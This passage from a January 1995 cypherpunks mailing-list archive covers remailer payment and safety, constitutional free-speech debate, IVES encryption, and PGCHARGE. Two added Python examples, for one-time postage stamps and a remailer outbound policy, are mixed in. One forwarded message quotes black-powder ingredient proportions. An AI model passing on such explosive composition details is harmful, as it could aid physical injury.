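        self._unused = set()     # digests of stamps sold but not yet spent

    @staticmethod
    def _digest(stamp: str) -> str:
        canonical = stamp.strip().lower()
        return hashlib.sha256(canonical.encode("utf-8", "replace")).hexdigest()

    def sell(self, count: int = 10, nbytes: int = 16) -> list:
        """Make `count` big random numbers, file them, return the buyer's copy."""
        stamps = [secrets.token_hex(nbytes) for _ in range(count)]
        self._unused.update(self._digest(s) for s in stamps)
        return stamps

    def redeem(self, stamp: str) -> bool:
        """Accept a stamp once; throwing the number out makes reuse fail."""
        digest = self._digest(stamp)
        if digest not in self._unused:
            return False         # never issued, or already spent
        self._unused.remove(digest)
        return True

    def unused(self) -> int:
        return len(self._unused)


def accept_message(book: StampBook, raw: str) -> bool:
    """Decide whether a message carries valid, unspent postage.

    The stamp is read from a hypothetical X-Postage header.
    """
    msg = email.message_from_string(raw)
    stamp = msg.get("X-Postage")
    if stamp is None:
        return False
    return book.redeem(str(stamp))


if __name__ == "__main__":
    book = StampBook()
    stamps = book.sell(10)
    # Constructed sample message carrying the first stamp.
    raw = ("To: someone@example.invalid\n"
           "X-Postage: " + stamps[0] + "\n"
           "\n"
           "message body\n")
    print("first delivery:", accept_message(book, raw))
    print("same stamp again:", accept_message(book, raw))
    print("stamps left:", book.unused())
```

A stamp travels in the clear with the message, so anyone who sees it in transit before the remailer does can spend it first; the scheme only guarantees that each number is honoured once.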





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Philippe Nave" <nave@abacus.dw.att.com>
Date: Tue, 10 Jan 95 22:05:45 PST
To: cypherpunks@toad.com
Subject: Odd bits, minutinae...
Message-ID: <9501110606.AA21223@abacus.ewindows>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Would *I* abstract an internal communique for a bunch of
net.riffraff? Surely not - you must know me better than that...

[...stuff...]

Search done for  Message:  <<< BELL LABS NEWS >>>
- ---------------- 
>>> ENCRYPTION -- This week, Bell Labs reported development of the AT&T
Information Vending Encryption System (IVES), a security system that protects
commercial information services -- such as video on demand, home shopping and
banking -- and electronic news and alerting services.  Using chips designed by
Bell Labs and VLSI Technologies, IVES works on various networks including the
Internet, cable TV networks and direct satellite broadcasting.  The first
application of IVES is in set-top cable television boxes being built by AT&T
for Cablevision Systems Corp., the nation's fifth-largest cable service
provider.  By employing secure cryptographic addressing, IVES will assure that
only paying customers receive enhanced pay-per-view and video-on-demand
services.  "There have been effective attacks on most, if not all, video
encryption systems, despite highly sophisticated countermeasures," said Dr.
David Maher, chief scientist for AT&T Secure Communications Systems.  "Hackers
are dedicated and can be well funded.  Incentives are rising rapidly."

[...stuff...]
Dedicated? Definitely. Well-funded? Hmmm.
This item is something for your acronym-scan parsers; will
IVES become interesting? (If not IVES, what of CURRIER? Whoa-
it was a joke, officer - CURRIER and IVES, get it? Oh, shit.)

Search done for  Message:  <<< BELL LABS IN THE NEWS >>>
- ---------------- 
>>> DNA -- In a bold experiment that provokes investigators to reconsider what
a computer is, a researcher has used the genetic material DNA as a sort of
personal computer.  The experiment's designer, Dr. Leonard Adleman, translated
a difficult math problem into the language of molecular biology and solved it
by carrying out a reaction in one-fiftieth of a teaspoon of solution in a test
tube.  Adleman, of the Univ. of Southern California in Los Angeles, used DNA
to solve a problem that involved finding the shortest path linking seven
cities.  Molecular computers, Adleman said, are fast and efficient, and they
have unheard-of storage capacities.  He said molecular computers can perform
more than a trillion operations per second, which makes them 1,000 times as
fast as the fastest supercomputer.  And they can store information in a
trillionth of the space ordinary computers require.  "It's a very intriguing
idea," said Ron Graham, of the Bell Labs Information Sciences Division at
Murray Hill.  "It's more than just cute.  It makes you think in a different
direction."  (from the Denver Post, Nov. 22, '94)

[...stuff...]
Hmmm. Have you ever been spied on by your own metabolism?
..... YOU WILL.

Then again, maybe not. FYI.

  -Philippe

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLxN0uQvlW1K2YdE1AQHMGAQAu5S0T9xUPsdY8SfB0k43bE2BNL5pb1OE
FAg7qjbJ1ugZw0EPDrGFBH7sjq2GHBhyXwgBrlL5j2oAVnnGL2+3QtrcyxIEsrXA
42ME+1JaOQo5+pclCjOrxF00MDoqGdw7hMLexGyawOs7zp+RGDrhPUkMG7ennpky
8QEfrFh8yYU=
=pI4l
-----END PGP SIGNATURE-----
-- 
........................................................................
Philippe D. Nave, Jr.   | Strong Crypto: Don't leave $HOME without it!
nave@abacus.dr.att.com  | 
Denver, Colorado USA    | PGP public key: by arrangement.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Tue, 10 Jan 95 23:46:44 PST
To: root@einstein.ssz.com (root)
Subject: Re: Pornography, What is it?
In-Reply-To: <199501110033.SAA00514@einstein.ssz.com>
Message-ID: <199501110734.XAA16586@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


root wrote:

> Also, the 1st Amendment says that Congress shall make no law, it doesn't say
> a damn thing about the states doing it. When I read this amendment what I  see
> is the founding fathers saying it is up to each state to decide for themselves.
> 
...
> The 1st. Amendment says nothing about what the states can do, only Congress.

The Amendment(s) may read "Congress shall make no law...," but the
states are *not* in fact able to pass laws restricting freedom of speech,
establish religions, quarter troops, and so on. Or, rather, they may
go ahead and pass such laws, but the Supreme Court will generally
strike them down as being "unconstitutional."

See how far Utah would get in establishing Mormonism as the official
state religion ("But the Constitution says _Congress_ shall make no
law, and we're not the Congress, so there!").

Deviations exist, of course. The Second Amendment is in fact routinely
trampled by various states and local jurisdictions, as states ban
various types of guns, etc. There is hope in the gun rights community
that the Supremes will someday deign to hear a case on this and so
strike down these laws which clearly controvert the Constitution.

I'm not a lawyer, and it's been 25 years since I was in a "civics"
class, so I'm sorry to not recall the precise language by which
"Congress shall make no law" also is taken to apply to Sacramento,
Albany, Austin, and so forth.


--Tim May





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cheap_anonymous@crl.com
Date: Tue, 10 Jan 95 21:39:56 PST
To: cypherpunks@toad.com
Subject: Jay Leno
Message-ID: <199501110448.XAA04663@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tonight on the Tonight Show with Jay Leno, Leno said:

"...why is O.J. writing a book? If he's so eager to tell his experiences, whisper it to Connie Chung."

Thought it might be mildly humorous for those of us who read Tim's message about Connie.

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxNjBioZzwIn1bdtAQGEzQF/XkfPjWrW2kbgpYLB6Gf1EiNXEJTwKW1l
mtuAnfhbSHsXPDIvv4IzGoAof2qlsd2v
=66P/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Tue, 10 Jan 95 21:56:58 PST
To: cypherpunks@toad.com
Subject: Re: Why use plastic for remailers and DH?
In-Reply-To: <Pine.3.89.9501102139.A36230-0100000@aix1.uottawa.ca>
Message-ID: <m0rRwAU-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Tue, 10 Jan 1995 21:54:24 -0500 (EST)
   From: Angus Patterson <s675570@aix1.uottawa.ca>

   This point may have been raised before, but anyway, unless you're using a 
   swiss-bank issued credit card for a numbered account (if that's at all 
   possible), or a bogus name on the card, why would anybody want to use 
   something as completely traceable as a credit card to pay for a remailer 
   or a data haven?

Because the message you sent into the remailer isn't traceable to the
message that left the remailer (isn't that the point?).  Give the FBI
credit for *some* brains and assume that they already know you used
the remailer, because they saw mail from you enter the remailer.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Tue, 10 Jan 95 22:00:04 PST
To: cypherpunks@toad.com
Subject: Suggestion for remailer operators.
Message-ID: <m0rRwDU-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


If you want to run a remailer fairly safely, insist that all outgoing
mail be encrypted, and put an X bytes/day limit on destinations other
than other remailers.  Why?  Because that way you can't use it to post
to Usenet (other than to annoy people a little with unreadable
postings), and you can't use it to mailbomb someone, and if the
recipient doesn't decrypt the message, there will be no possible
offending content.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?
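
The two rules suggested in the message above (outgoing mail must be encrypted; a bytes/day limit on destinations that are not remailers) as an added example of an outbound policy check. This is not code from the original post or from any remailer; the class name, return strings and addresses are assumptions, and the armor check only confirms that the body is shaped like a PGP message, not that it is real ciphertext.

```python
import re
from collections import defaultdict

BEGIN = "-----BEGIN PGP MESSAGE-----"
END = "-----END PGP MESSAGE-----"
HEADER = re.compile(r"^[A-Za-z-]+: \S.*$")        # e.g. "Version: 2.6.2"
RADIX64 = re.compile(r"^[A-Za-z0-9+/=]{1,76}$")   # armor data and checksum lines

# Constructed sample body: armor-shaped, not real ciphertext.
SAMPLE_ENCRYPTED = (
    "-----BEGIN PGP MESSAGE-----\n"
    "Version: 2.6.2\n"
    "\n"
    "hQCMAwAAAAAAAAABA/constructed+sample+only\n"
    "=abcd\n"
    "-----END PGP MESSAGE-----\n"
)


def looks_encrypted(body: str) -> bool:
    """True only if the whole body is a single PGP MESSAGE armor block."""
    lines = [line.rstrip("\r") for line in body.strip().split("\n")]
    if len(lines) < 3 or lines[0] != BEGIN or lines[-1] != END:
        return False             # plaintext, clearsigned text, or text around the armor
    inner = lines[1:-1]
    if "" in inner:              # armor headers end at the first blank line
        split = inner.index("")
        headers, inner = inner[:split], inner[split + 1:]
        if not all(HEADER.match(h) for h in headers):
            return False
    return bool(inner) and all(RADIX64.match(line) for line in inner)


class OutboundPolicy:
    """Encrypted-only forwarding with a per-destination daily byte quota."""

    def __init__(self, remailers, daily_limit: int) -> None:
        self.remailers = {addr.strip().lower() for addr in remailers}
        self.daily_limit = daily_limit               # the "X bytes/day"
        self.sent = defaultdict(int)                 # (day, destination) -> bytes

    def check(self, day: str, destination: str, body: str) -> str:
        dest = destination.strip().lower()
        if not looks_encrypted(body):
            return "reject: not encrypted"
        if dest in self.remailers:
            return "forward"                         # remailer hops are not limited
        size = len(body.encode("utf-8"))
        if self.sent[(day, dest)] + size > self.daily_limit:
            return "reject: over daily quota"
        self.sent[(day, dest)] += size
        return "forward"


if __name__ == "__main__":
    size = len(SAMPLE_ENCRYPTED.encode("utf-8"))
    policy = OutboundPolicy(["remailer@example.invalid"], daily_limit=2 * size)
    for attempt in range(3):
        print(attempt + 1, policy.check("1995-01-10", "user@example.invalid",
                                        SAMPLE_ENCRYPTED))
    print(policy.check("1995-01-10", "user@example.invalid", "hello in the clear"))
```

Armor header lines such as `Comment:` still carry readable text, which is why the check validates their shape but cannot make them content-free.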




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@io.com (Jim McCoy)
Date: Tue, 10 Jan 95 23:12:17 PST
To: root@einstein.ssz.com (root)
Subject: Re: Pornography, What is it?
In-Reply-To: <199501110033.SAA00514@einstein.ssz.com>
Message-ID: <199501110712.BAA22058@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: root <root@einstein.ssz.com>
[...]
> Also, the 1st Amendment says that Congress shall make no law, it doesn't say
> a damn thing about the states doing it.

While in 1850 this might have been the case, you should check some of the
later amendments for an update on what has happened in the last 150 years
of Con Law...

jim



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Tue, 10 Jan 95 22:42:03 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: [SILLY] Re: Spying via DNA
In-Reply-To: <9501110606.AA21223@abacus.ewindows>
Message-ID: <199501110643.BAA08356@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Philippe Nave writes:
> Hmmm. Have you ever been spied on by your own metabolism?

My metabolism even knows what I ate for breakfast today !!

(sorry, couldn't resist)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Tue, 10 Jan 95 22:52:30 PST
To: cypherpunks@toad.com
Subject: Re: Why use plastic for remailers and DH?
Message-ID: <199501110657.BAA06563@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Angus Patterson writes:
> why would anybody want to use something as completely traceable as a 
> credit card to pay for a remailer or a data haven?

Apart from what Russ Nelson observed, safety in numbers is potentially great.
If, say, 15% of the net.populace does it, then it won't be terribly
interesting to know that some particular person has done it. I suppose a
transition period would be helpful, in which credit card-financed bandwidth
is increased with a load of low security traffic.

 -L. Futplex McCarthy


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxOBOyoZzwIn1bdtAQHAXAF+Jcfrh9xhfx7MlS6oK5Cfu4E96P+rOuGW
Xto/oQG7HcqAbl2adr0zyMQnfh4alDgk
=FtZw
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Tue, 10 Jan 95 23:09:15 PST
To: root <root@einstein.ssz.com>
Subject: Re: Pornography, What is it?
In-Reply-To: <199501110033.SAA00514@einstein.ssz.com>
Message-ID: <Pine.SOL.3.90.950111015550.18293B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




The 1st says "Congress shall make no law..." and you are right, the
founding fathers meant to leave the states free to do as they pleased.

However, the 14th amendment says "...No state shall make or enforce
any law which shall abridge the privileges or immunities of citizens
of the United States...."  This has been used to enforce Bill of Rights
protections against state laws.

Reading my "Citizens Rule Book," provided by a friend,

Brad D.


On Tue, 10 Jan 1995, root wrote:

> > 
> > You seem to have missed where I say that I don't agree with this
> > line of reasoning. I tend to believe that the first amendment means
> > what it says. (I.e. make no law.) But the fact of the matter is that
> > the people who make the law think differently, right or wrong.
> >
> I understand, I just don't think most of the folks out there against porno 
> are interested in constitutional rights. They don't see them as relevant to 
> their day to day lives. You might call it a sort of cult of personality which
> is using religion as the head.
>  
> Also, the 1st Amendment says that Congress shall make no law, it doesn't say
> a damn thing about the states doing it. When I read this amendment what I  see
> is the founding fathers saying it is up to each state to decide for themselves.
> 
> And since Congress is placed in charge of inter-state relations it is quite
> simple to reduce this to mean that States may not apply their standards to 
> other states because they would then be acting in the place of the federal
> government.
> 
> > >I understand what you are saying, what I am saying is the distinction is not
> > >used in practice. The bbs operator in Cali. that was busted in Tennessee was
> > >busted for delivering PORNOGRAPHY (not obscenity) to a minor (in short a 14
> > >year old's account being operated by an oinkdroid.)
> > The key word here is 'minor'. Minors have nowhere near the rights
> > that adults have. Try banning the sale of pornography to demonstrated
> > adults. 
> >
> Yes, but at no time was it proved that a minor DID d/l the file only that they
> could. Big distinction to me. An oinkdroid did the d/l'ing by playing like the
> 14 year old. To me this is entrapment.  
> >
>  I think you misunderstand. The First Amendment places restrictions
> > upon what the States may do. The States are free to make such
> > laws or NOT. Some don't. Most do.
> > 
> The 1st. Amendment says nothing about what the states can do, only Congress.
> 
> > It's all very well and good to say such things, but this formulation
> > of liberty has no reasonable basis in Constitutional Law. The
> > Bill of Rights does not encode Mill's On Liberty, as much as you
> > might like it to.
> >
> Then I suggest you read the 9th and 10th Amendment. The 9th says the states
> will ALWAYS get the benefit of the doubt. The 10th says the federal government
> will NEVER get it unless there is a Constitutional Amendment.
>  
> > Huh? Obscenity has to do with freedom of speech, not action. It's
> > an exception to the First Amendment, not to some general class
> > of liberties. Depictions of anal sex are typically not considered
> > obscene. The act of anal sex is often made illegal, but that's an
> > entirely separate issue.
> It is made illegal because it is considered obscene. You seem to be skirting
> the issue here. And since when is speech not an act? There are a whole list
> of things included in the freedom of speech issue (ie freedom of the press)
> that clearly implies that speech is one kind of act.
> 
> > 
> > >Also, the whole concept of community standards is unworkable. Whose community?
> > The community passing the law.
> Last time I checked such cases were tried by 12 peers, this hardly qualifies as
> community by any definition. It is not like they take a vote of all the people
> in the community of voting age (which they should).
> > 
> > 
> > Look, you can make general arguments about the way that you think
> > that your liberty should be, but the only legal basis you have
> > for claims that you have the freedom to do something is the
> > Bill of Rights. I'm arguing from that basis.
> >
> As am I. I base each and every one of my beliefs about how this government
> is supposed to be run on that document and that document alone. It is not
> the supreme law of the land for nothing.
> 
> 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@io.com (Jim McCoy)
Date: Wed, 11 Jan 95 01:11:56 PST
To: lmccarth@ducie.cs.umass.edu (L. McCarthy)
Subject: Re: Storm Signals
In-Reply-To: <199501110842.DAA07468@bb.hks.net>
Message-ID: <199501110911.DAA05932@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


L. McCarthy writes:
> Sam Kaplin writes:
> > Todd Masco writes:
> > > 	1: Somebody's roommate (a Green Beret) has been called back into
> > > 		6 months of active service.  He was not told where he'd be.
> > Perhaps Bosnia?
> 
> I doubt it. [...]
> 
> Frankly, I'm quite puzzled by these signs. I can't think of any country that
> seems due for a quick invasion by the USG, but the increase in granularity of
> the GPS information suggests an operation of greater magnitude than just a
> strike against terrorists, drug cartels etc.

Military action also requires political will, and with the recent change
in power in the US govt there is no way anything is going to happen for at
least six months.  Freshmen congressmen do not sign off on a war the first
month they get into Washington unless the populace is frothing at the mouth
to kill someone, and that isn't happening.  Clinton does not have the
political pull to get anything related to military action through Congress
at this time, and he can't afford to challenge a legislature he no longer
controls so any call to arms is probably not coming from the Executive
branch.  I also doubt he would be stupid enough to try a "Commander in
Chief" action and hope that the Republicans would forget who scores the
popularity points in such an activity and back him up, the legislature
would crucify him with the electorate for trying a move like this.

OTOH, Green Berets are not the kind of troops used for "strike" actions.
Their primary specialty is low-intensity conflict and working with
indigenous armies.  Given the current geopolitical situation it seems that
Bosnia is the only conflict that the US population cares about at all that
would call for the use of Green Berets.  Then again, maybe the military is
just trying to increase its readiness in the hopes that a Republican
legislature will let them use their toys again...

jim



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Wed, 11 Jan 95 01:59:51 PST
To: "L. McCarthy" <cypherpunks@toad.com
Subject: Re: Storm Signals
In-Reply-To: <199501110842.DAA07468@bb.hks.net>
Message-ID: <WHw4lKjqRq69077yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199501110842.DAA07468@bb.hks.net>, you wrote:
> [BEGIN PGP SIGNED MESSAGE]
> [BEGIN PGP SIGNED MESSAGE]
> Sam Kaplin writes:

> > Perhaps Bosnia?
>
> I doubt it. The only sort of Bosnian engagement that might make sense would
> involve a fairly conspicuous effort with a large number of troops. I can't
> see what a few thousand Green Berets could accomplish there.
>
> Frankly, I'm quite puzzled by these signs. I can't think of any country that
> seems due for a quick invasion by the USG, but the increase in granularity of
> the GPS information suggests an operation of greater magnitude than just a
> strike against terrorists, drug cartels etc.
>
> Is it time for Bay of Pigs II already ?  ;)

Perhaps it is two unrelated events. Maybe the Russians are using GPS in
their attack on Chechnya, and the administration decided "Not on our dime."

The call up could possibly be related to the repatriation of the Haitian
boat people or even a continued presence in Haiti. I think Aristide still
needs lots of propping up. The Ton-Ton Macoutes, from Baby Doc and Papa
Doc's dictatorship were the police and military of the previous one. They
just vanished into the population. It's almost the perfect guerilla force,
just the thing the berets are into. This would be much more likely if the
individual was of African descent. From what I have heard, prior to any
military action in Haiti, we had a sizable force of Special Forces, Green
Berets and other elite troops in place. Most of them were black. This was
because they blended in with the populace. Perhaps the forces on the ground
needed to be rotated and personnel came up short. I don't know...but if it
is anything, we should find out real soon.

Mandatory crypto thought...I wonder if the government has taken any steps
to prevent the INTERNET from being used for C3 functions, like it was used
during the gulf war by Iraq. (I know...I know...pretty weak, but the
communications has to have been encrypted. :) )

Sam

BTW-You always do this to me Louis...I was just going to go to bed, and
boom I'm up another hour. Grrrrrrrrrrr ;)
- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
    And Lao-tse said: Those who know don't tell; those who tell don't know.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Wed, 11 Jan 95 00:29:41 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Re: Pornography, What is it?
In-Reply-To: <199501110734.XAA16586@netcom20.netcom.com>
Message-ID: <Pine.SUN.3.91.950111032338.5716A-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Jan 1995, Timothy C. May wrote:

> The Amendment(s) may read "Congress shall make no law...," but the
> states are *not* in fact able to pass laws restricting freedom of speech,
> establish religions, quarter troops, and so on. Or, rather, they may
> go ahead and pass such laws, but the Supreme Court will generally
> strike them down as being "unconstitutional."

The 14th Amendment ensures that states shall not infringe on all 
"privileges and immunities" of citizens of the USA.  The Slaughterhouse 
cases created an interesting judgement that the 14th is not talking about 
all rights of American citizens, but only those coming directly from 
citizenship, thus the Supreme Court must explicitly "incorporate" parts 
of the Bill of Rights via the 14th Amendment to the States.  While 
freedom of speech has been "incorporated," the right to trial by jury has 
not, and neither has the Second Amendment for either individual right to 
keep and bear arms or collective (state government) right to keep and 
bear arms.

It is pretty obvious the 14th was established to limit the ability of 
States to infringe on the civil rights of blacks.  After reading the 
Slaughterhouse cases, I side with the dissenting Justices and feel that 
it should apply to all rights mentioned in the Constitution.  But that 
isn't the law...

(This is a fairly common thread on talk.politics.guns)

-Thomas






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Wed, 11 Jan 95 00:37:59 PST
To: cypherpunks@toad.com
Subject: Re: Storm Signals
Message-ID: <199501110842.DAA07468@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Sam Kaplin writes:
> Todd Masco writes:
> > 	1: Somebody's roommate (a Green Beret) has been called back into
> > 		6 months of active service.  He was not told where he'd be.
> 
> Perhaps Bosnia?

I doubt it. The only sort of Bosnian engagement that might make sense would
involve a fairly conspicuous effort with a large number of troops. I can't
see what a few thousand Green Berets could accomplish there.

Frankly, I'm quite puzzled by these signs. I can't think of any country that
seems due for a quick invasion by the USG, but the increase in granularity of
the GPS information suggests an operation of greater magnitude than just a
strike against terrorists, drug cartels etc.

Is it time for Bay of Pigs II already ?  ;)

 -L. Futplex McCarthy

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxOZ9ioZzwIn1bdtAQFF/QGAiqkCeSwdxCMlF0AeO6jOJkaxKQ4EAe68
+AYM/slciv3rbqrkw6nRf19LM7AmXBsG
=lDeV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Parsons <parsons@bga.com>
Date: Wed, 11 Jan 95 05:30:33 PST
To: cypherpunks@toad.com
Subject: Re: CBS/C.Chung Plan Hit Job on Internet? (fwd)
Message-ID: <Pine.3.89.9501110741.A6129-0100000@ivy.bga.com>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
Date: Tue, 10 Jan 95 21:02:06 PST
From: Greg Bailey <greg@minerva.com>
Subject: Re: CBS/C.Chung Plan Hit Job on Internet?

Non sequitur, I think, Helen.  The above reads like a lame lemma of
the Gun Control theorem and is based on the same fallacious premises.
Information is not intrinsically harmful.  People are.  Information
and other means need not be controlled.  People must control themselves.
If the people in a society cannot control their temptations to do
evil with whatever means are available to them, the society cannot be
called civilized by any reasonable criteria.  Making information
available is not a crime.  Blowing people up is a crime, and those
who do it should pay pay pay.

Any discipline worth studying gives its students the means to do good
as well as evil, and at least in theory the more they know the greater
their potential to act in either direction.

Throughout history damn fools have tried to limit the scope of evil
by limiting information.  All it has demonstrated is that by doing
so one can hamstring constructive activity while accomplishing nearly
zero against evil due to its tenacity.

It is my opinion that the most evil thing anyone can advocate is the
limiting of information, especially since in many cases those who
propose to do the limiting do not even faintly understand the info
themselves.  It is also my opinion that to resist any efforts to
limit availability of information is *not* to bury one's head under
the sand.  Not at all.

All the theory aside, any elementary school kid who pays attention
and knows how to read can easily acquire the art of making gunpowder.
At least this was true in the fifties when I was at that age, and
being boys my friends and I of course spent many a happy hour out
in secluded fields blowing things up in various ways.  This sort
of thing is basic information that anyone brighter than a rock
can come by.

Connie Chung displays an astounding level of ignorance by suggesting
that high technology has much of anything to do with the phenomenon
she reports upon.  Instead she should be asking why kids now feel
they should blow up people and property instead of old castaway
junk.  *That* is the story, not the Internet, not Encyclopaedia
Britannica ... quoting from this year's edition, by the way, from
our kids' book case:

  gunpowder ... The first such mixture was black powder, which consists
  of a mixture of saltpetre (potassium nitrate), sulfur, and charcoal.
  When prepared in roughly the correct proportions (75 percent saltpetre,
  14 percent charcoal, and 11 percent sulfur), it burns rapidly when
  ignited and produces ... Because the burning of black powder is a
  surface phenomenon, a fine granulation burns faster than a coarse
  one ... [more straightforward practical information follows]

I wonder if Connie reads the encyclopedia.
I wonder if she even has one?

Grins...

    Greg Bailey     |  ATHENA Programming, Inc  |  503-621-3215  |
  ----------------  |  24680 NW Dixie Mtn Road  |  fax 621-3954  |
  greg@minerva.com  |  Hillsboro, OR 97124  US  |








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 11 Jan 95 04:40:22 PST
To: cypherpunks@toad.com
Subject: credit card purchases
Message-ID: <v01510101ab397ac7da98@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Saw it there. Thought you might like it here...

Cheers,
Bob Hettinga

>From: peace@BIX.com
>Date: Wed, 11 Jan 1995 00:26:50 -0500 (EST)
>Original-From: peace@BIX.com
>Subject: credit card purchases
>To: www-buyinfo@allegra.att.com
>X-Cosy-To: www-buyinfo@allegra.att.com
>
>                              PGCHARGE
>
>This is a call for interested parties to participate in the alpha
>test of an internet ordering program that will be offered to any
>customer free of charge to create orders that should be
>acceptable to any commercial establishment.
>
>This is a Windows program designed to generate secure charge card
>orders over the internet. The payment mechanism is not the
>critical component for this system, that critical component is
>the use, by the purchaser, of the merchant's public key, for the
>protection of sensitive data, including simple correspondence.
>
>Two paradigms from the commercial world, EDI and email were
>selected for the implementation.  Email operates in a store and
>forward mode that has some security advantages over web or
>network layer security.  That advantage comes directly from the
>fixed nature of the email message itself.  Once it has been
>created and signed by the keyholder, it cannot successfully be
>altered by any other person.  It is also possible for the message
>to be encrypted at the point where it is created.  Hiding the
>contents of the message from anyone other than the intended
>recipient.
>
>EDI has already achieved a great deal of acceptance in the
>commercial world.  This application is a natural use of the
>existing ANSI X12 structures for issuing a purchase order.  Any
>merchant that is currently using X12 structures should be able to
>purchase a single user ViaCrypt PGP license and be in business
>accepting secure credit card orders over the internet.
>
>PGCHARGE does not add any security features by itself, but rather
>facilitates security by building an EDI transaction for a
>recipient selected from a PGP public keyring.  This information
>is then passed to PGP to be secured.  PGCHARGE then waits for PGP
>to complete, adds the appropriate email headers and invokes a
>mailer program.
>
>This program can be downloaded from ftp.csn.org as
>mpj/public/pgcharge.zip.  Comments can be sent to peace@bix.com.
>

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Corbet <corbet@stout.atd.ucar.edu>
Date: Wed, 11 Jan 95 07:34:33 PST
To: cypherpunks@toad.com
Subject: MBONE broadcasts next week
Message-ID: <199501111534.IAA23174@atd.atd.ucar.EDU>
MIME-Version: 1.0
Content-Type: text/plain


The USENIX folks plan to broadcast (well..err...multicast) a number of
talks from next week's conference over the MBONE.  Details are still
unavailable, but Evi has posted the following interesting list of folks:

----
Wednesday, January 18:
Bruce Schneier, Counterpane Systems	    Cryptography
Brad Chen, Harvard Univ			    Operating System Measurement

